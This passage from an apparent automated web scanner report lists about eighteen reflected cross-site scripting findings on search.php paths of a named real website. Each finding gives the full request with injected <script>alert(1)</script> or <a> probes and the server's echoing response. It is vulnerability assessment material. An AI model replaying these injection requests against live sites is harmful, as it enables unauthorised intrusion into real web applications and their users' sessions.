<p>The requested URL /detail/19/themes/kosmos/images/rating/search.php4b22d<script>alert(1)</script>5e6e863dc43?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1618. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d7eb5<a>4959c98ce31 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchd7eb5<a>4959c98ce31&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchd7eb5<a>4959c98ce31&opt=2 was not found on this server.</p>
...[SNIP]...

2.1619. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload fd71c<a>f1fe3f6bf29 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/images/rating/search.php?keyword=search...fd71c<a>f1fe3f6bf29&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/search.php?keyword=search...fd71c<a>f1fe3f6bf29&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1620. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bee94<script>alert(1)</script>7ef020e26c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&bee94<script>alert(1)</script>7ef020e26c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&bee94<script>alert(1)</script>7ef020e26c=1 was not found on this server.</p>
...[SNIP]...

2.1621. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7a504<a>5f1717ce59b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=27a504<a>5f1717ce59b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=27a504<a>5f1717ce59b was not found on this server.</p>
...[SNIP]...

2.1622. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ed8ab<script>alert(1)</script>077e4fe547c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailed8ab<script>alert(1)</script>077e4fe547c/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailed8ab<script>alert(1)</script>077e4fe547c/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1623. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 736a9<script>alert(1)</script>2234e7f5a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19736a9<script>alert(1)</script>2234e7f5a7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19736a9<script>alert(1)</script>2234e7f5a7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1624. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68424<script>alert(1)</script>25a010e757d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes68424<script>alert(1)</script>25a010e757d/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes68424<script>alert(1)</script>25a010e757d/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1625. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 51b66<script>alert(1)</script>bd84eba4d9d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos51b66<script>alert(1)</script>bd84eba4d9d/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos51b66<script>alert(1)</script>bd84eba4d9d/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1626. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3d9fb<script>alert(1)</script>bf0ccb638de was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images3d9fb<script>alert(1)</script>bf0ccb638de/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images3d9fb<script>alert(1)</script>bf0ccb638de/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1627. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 74843<script>alert(1)</script>3c9f11272e3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/search.php74843<script>alert(1)</script>3c9f11272e3?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/search.php74843<script>alert(1)</script>3c9f11272e3?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1628. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e691e<a>bdbfa1498ca was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche691e<a>bdbfa1498ca&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche691e<a>bdbfa1498ca&opt=2 was not found on this server.</p>
...[SNIP]...

2.1629. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 93c35<a>6726b78b5ef was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/images/search.php?keyword=search...93c35<a>6726b78b5ef&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/search.php?keyword=search...93c35<a>6726b78b5ef&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1630. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 17861<script>alert(1)</script>5fd981b4783 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&17861<script>alert(1)</script>5fd981b4783=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&17861<script>alert(1)</script>5fd981b4783=1 was not found on this server.</p>
...[SNIP]...

2.1631. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 92d7c<a>04abae5243 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=292d7c<a>04abae5243 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=292d7c<a>04abae5243 was not found on this server.</p>
...[SNIP]...

2.1632. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5d200<script>alert(1)</script>ca32c867b6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5d200<script>alert(1)</script>ca32c867b6d/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5d200<script>alert(1)</script>ca32c867b6d/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1633. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 12062<script>alert(1)</script>088906f3de7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1912062<script>alert(1)</script>088906f3de7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1912062<script>alert(1)</script>088906f3de7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1634. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b078e<script>alert(1)</script>f164f1565d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themesb078e<script>alert(1)</script>f164f1565d3/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themesb078e<script>alert(1)</script>f164f1565d3/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1635. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4fdfe<script>alert(1)</script>289d8c6c7c3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos4fdfe<script>alert(1)</script>289d8c6c7c3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

